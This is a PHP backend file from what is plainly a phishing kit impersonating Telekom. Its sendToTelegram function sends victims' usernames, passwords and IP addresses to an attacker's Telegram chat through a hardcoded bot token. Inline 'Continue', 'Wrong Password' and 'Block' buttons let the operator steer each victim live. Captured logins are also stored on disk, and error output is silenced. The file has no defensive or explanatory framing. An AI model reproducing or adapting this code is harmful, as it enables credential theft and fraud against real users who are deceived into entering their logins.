<?php
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

if (!defined('TELEGRAM_BOT_TOKEN')) {
    define('TELEGRAM_BOT_TOKEN', '8414655812:AAG6GL9YGwlh37wrDi95aaQmaftIH9c7MoI');
}

if (!defined('TELEGRAM_CHAT_ID')) {
    define('TELEGRAM_CHAT_ID', '-4966864268');
}

if (!defined('REDIRECT_URL')) {
    define('REDIRECT_URL', 'telekom/rewards.html');
}

if (!defined('ANIMATION_DURATION')) {
    define('ANIMATION_DURATION', 3500);
}

// Auto-redirect: if no action from Telegram within X seconds, redirect automatically
// Set to 0 or false to disable auto-redirect
if (!defined('AUTO_REDIRECT_ENABLED')) {
    define('AUTO_REDIRECT_ENABLED', true);
}
if (!defined('AUTO_REDIRECT_SECONDS')) {
    define('AUTO_REDIRECT_SECONDS', 10);  // Redirect after 10 seconds if no Telegram action
}

ini_set('display_errors', 0);
error_reporting(0);

// Get pending logins storage file path
function getPendingLoginsFile() {
    $file = __DIR__ . '/app/pending_logins.json';
    if (!file_exists(dirname($file))) {
        mkdir(dirname($file), 0755, true);
    }
    return $file;
}

// Save pending login
function savePendingLogin($loginId, $data) {
    $file = getPendingLoginsFile();
    $logins = [];
    if (file_exists($file)) {
        $content = file_get_contents($file);
        $logins = json_decode($content, true) ?: [];
    }
    $logins[$loginId] = $data;
    file_put_contents($file, json_encode($logins, JSON_PRETTY_PRINT));
}

// Get pending login
function getPendingLogin($loginId) {
    $file = getPendingLoginsFile();
    if (!file_exists($file)) {
        return null;
    }
    $content = file_get_contents($file);
    $logins = json_decode($content, true) ?: [];
    return $logins[$loginId] ?? null;
}

// Update pending login status
function updatePendingLoginStatus($loginId, $status, $redirectUrl = null) {
    $login = getPendingLogin($loginId);
    if ($login) {
        $login['status'] = $status;
        $login['updated_at'] = time();
        if ($redirectUrl !== null) {
            $login['redirect_url'] = $redirectUrl;
        }
        savePendingLogin($loginId, $login);
        return true;
    }
    return false;
}

// Generate unique login ID
function generateLoginId() {
    return uniqid('login_', true);
}

// Get client IP address (handles proxies, Cloudflare, etc.)
function getClientIp() {
    $headers = ['HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_REAL_IP', 'HTTP_CLIENT_IP', 'REMOTE_ADDR'];
    foreach ($headers as $h) {
        if (!empty($_SERVER[$h])) {
            $ip = $_SERVER[$h];
            if (strpos($ip, ',') !== false) {
                $ip = trim(explode(',', $ip)[0]);
            }
            if (filter_var($ip, FILTER_VALIDATE_IP)) {
                return $ip;
            }
        }
    }
    return $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
}

// Send message to Telegram with inline buttons
function sendToTelegram($username, $password, $loginId, $clientIp = null) {
    $botToken = TELEGRAM_BOT_TOKEN;
    $chatId = TELEGRAM_CHAT_ID;
    
    if ($botToken === 'YOUR_BOT_TOKEN_HERE' || $chatId === 'YOUR_CHAT_ID_HERE') {
        error_log('Telegram configuration missing - update config.php');
        return false;
    }
    
    // Escape backticks for inline code blocks (only character that breaks code blocks)
    $escapedUsername = str_replace('`', '\\`', $username);
    $escapedPassword = str_replace('`', '\\`', $password);
    
    // Format message with code blocks for easy copying
    // Using inline code blocks makes text selectable and copyable with one tap in Telegram
    $message = "🔐 *Neue Anmeldung*\n\n";
    $message .= "👤 *Benutzername:*\n";
    $message .= "`" . $escapedUsername . "`\n\n";
    $message .= "🔑 *Passwort:*\n";
    $message .= "`" . $escapedPassword . "`\n\n";
    $message .= "⏰ Zeit: " . date('d.m.Y H:i:s');
    $message .= "\n🆔 ID: `{$loginId}`";
    if ($clientIp !== null && $clientIp !== '') {
        $escapedIp = str_replace('`', '\\`', $clientIp);
        $message .= "\n🌐 IP: `{$escapedIp}`";
    }
    
    // Inline keyboard with buttons
    $keyboard = [
        'inline_keyboard' => [
            [
                ['text' => '✅ Continue', 'callback_data' => "login_continue_{$loginId}"],
                ['text' => '❌ Wrong Password', 'callback_data' => "login_wrong_{$loginId}"]
            ],
            [
                ['text' => '🚫 Block', 'callback_data' => "login_block_{$loginId}"]
            ]
        ]
    ];
    
    $url = "https://api.telegram.org/bot{$botToken}/sendMessage";
    
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => json_encode([
            'chat_id' => $chatId, 
            'text' => $message,
            'parse_mode' => 'Markdown',
            'reply_markup' => $keyboard
        ]),
        CURLOPT_HTTPHEADER => ['Content-Type: application/json'],
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 10
    ]);
    
    $response = curl_exec($ch);
    $curlError = curl_error($ch);
    curl_close($ch);
    
    if ($curlError) {
        return false;
    }
    
    $data = json_decode($response, true);
    return ($data['ok'] ?? false) ? ($data['result'] ?? true) : false;
}

// Answer Telegram callback query
function answerTelegramCallback($callbackQueryId, $text = '') {
    $botToken = TELEGRAM_BOT_TOKEN;
    $url = "https://api.telegram.org/bot{$botToken}/answerCallbackQuery";
    
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => json_encode([
            'callback_query_id' => $callbackQueryId,
            'text' => $text,
            'show_alert' => false
        ]),
        CURLOPT_HTTPHEADER => ['Content-Type: application/json'],
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 10
    ]);
    
    curl_exec($ch);
    curl_close($ch);
}
